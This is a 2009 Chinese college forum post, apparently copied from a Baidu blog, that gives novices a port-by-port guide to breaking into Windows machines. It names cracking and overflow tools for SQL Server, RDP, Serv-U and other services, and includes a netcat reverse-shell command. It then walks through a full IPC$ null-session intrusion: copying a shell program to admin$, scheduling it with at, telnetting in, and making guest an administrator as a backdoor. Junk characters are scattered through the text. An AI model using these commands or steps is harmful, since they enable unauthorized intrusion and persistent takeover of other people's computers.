设为首页

广西经贸职业技术学院论坛

 忘记密码
 免费注册
查看: 1158|回复: 0
打印 上一主题 下一主题

各个端口入侵方法

[复制链接]
  • TA的每日心情

    2019-8-18 09:37
  • 签到天数: 2 天

    [LV.1]初来乍到

    跳转到指定楼层
    楼主
    发表于 2009-10-16 03:00:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
    来源:hi.baidu
    0 Q" W* I( A& y9 e$ ]7 F希望对新手入侵有帮助!
    9 l6 e* {' x% A# L+ P' e! E  1. 1433端口入侵
    & a& c9 J# p' Q. Z/ k  scanport.exe 查有1433的机器" l. A; r: `2 X% h
      SQLScanPass.exe 进行字典暴破(字典是关键)
    % C6 Z9 p9 ?# g5 j  V/ N& ]  最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。6 K' d- k* w' M! ~
      nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口2 a- ]" [$ Z9 S7 M/ ~/ l
      (以上反向的,测试成功)
    2 ]4 N' `$ |+ ?% |, Z* J  sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
    9 K) i) d$ P. G  2. 4899端口入侵7 `# I- Z1 t% E0 q6 S* N2 o4 p
      用4899过滤器.exe,扫描空口令的机器6 I- K& A3 p: ^  Z
      3. 3899的入侵
    - Y; U2 K8 l9 ^" [! o  对很早的机器,可以试试3389的溢出(win3389ex.exe)
    & M' f9 U2 N2 u! E6 _: ^( P  对2000的机器,可以试试字典暴破。(tscrack.exe)
    ( B/ J8 m9 Z* e  N, G+ s7 [: V  4. 80入侵
    6 d7 \, v5 g1 Y! v9 C  对sp3以前的机器,可以用webdav入侵;! ?9 m4 E8 c" }6 y2 n
      对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
    & ?1 q) B! x, x; V' z$ J  可以利用SQL进行注入。(啊D的注入软件)。0 {: U) a1 R# @! @
      5. serv-u入侵(21端口)) Z- v0 }% G& i' y' D5 \# U
      对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
    & f! O8 k" j0 K/ K# r7 A  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)# }- f& h" p' n7 f; k3 l
      对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
    6 R1 G9 d$ }2 N3 v  输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
    6 O  S& R; n+ z6 e  6. 554端口
    3 Y! h% O/ r" s; n+ u  用real554.exe入侵。3 M/ A8 n% Y3 |
      7. 6129端口: t% n  H% C: d+ E) `
      用DameWare6129.exe入侵。2 X0 w4 p% T/ P9 q7 H- Z0 w: i
      8. 系统漏洞1 H" d5 {9 Q3 I# `. n0 T" M8 U, H
      利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。% c. J4 A0 b: a( D# R
    9. 3127等端口- h! r% W) V7 s$ ~/ c1 B  W1 c

    " J" L) n5 r) k  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。& q  N: ^- F. n! ]+ R" C! h
      10. 其他入侵
    - ?+ r$ r# H3 L& a5 ^  利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
    6 ~6 V" b5 s; `0 U2 a8 [4 h1 ?; n# v* g" B% a- @1 R! }' h5 |
                                  经典IPC$入侵: P8 E1 I8 ^8 Q# m5 ~1 v$ b

    0 K! t/ v- d' u2 b* P* N6 n" b  1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
    3 x7 v* D4 m# C; @+ }- \; F2 S  这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。7 i" k# m7 z) {. [2 w: M
      2. C:\>copy srv.exe $">\\127.0.0.1\admin$
    8 [* U/ z7 s) T& ~5 |, {1 y  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
    ) C& P! O. W$ E  3. C:\>net time file://127.0.0.1/$ Y% g+ H9 Z$ T/ ^* ?$ i
      查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。  c2 a) \  g2 x, F  w6 y- e
      4. C:\>at file://127.0.0.1/ 11:05 srv.exe* X  }6 H- S6 f
      用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
      x: {! |: I' J8 Y; k  5. C:\>net time file://127.0.0.1/
    ; b8 B3 {6 ^- \) u  Z3 F' P( j' ^& H6 p  再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。( a+ b: ~' \) c8 D7 R: A4 f! q
      6. C:\>telnet 127.0.0.1 99
    7 O/ Y5 V  K& N+ O2 J  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
    ' |8 b6 g- |( a! B' q  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
    . e4 L# h) l% v, W2 i+ V+ O7 Q4 {) D  7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$
    0 [! R5 M/ D* m* J# V9 _& ^  k& l  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。. s' J  }- Q7 Z" c1 H
      8. C:\WINNT\system32>ntlm
    0 m+ t7 u; n5 h1 D2 x  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!$ h  h- }' S: ]* e
      9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
    7 ^2 r! I5 p- F8 t: x, h: m9 D& A  10. C:\>net user guest /active:yes. [- U4 s% c! i  S5 V
      将对方的Guest用户激活$ ^- E9 A3 [+ ^; G$ ~. @$ ]
      11. C:\>net user guest 1234
    , ], P- q$ q7 O/ Z5 X8 g  将Guest的密码改为1234,或者你要设定的密码
    ! H) {, D! }# K  12. C:\>net localgroup administrators guest /add8 w& y5 z* q  M& G
      将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
    常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~
    您需要登录后才可以回帖 登录 | 免费注册

    本版积分规则

    QQ|版主考核中心|飞翔无限『经贸在线』 ( 桂ICP备15001539号-2  

    GMT+8, 2025-10-31 14:51

    Powered by Discuz! X3.2

    © 2001-2013 Comsenz Inc.

    快速回复 返回顶部 返回列表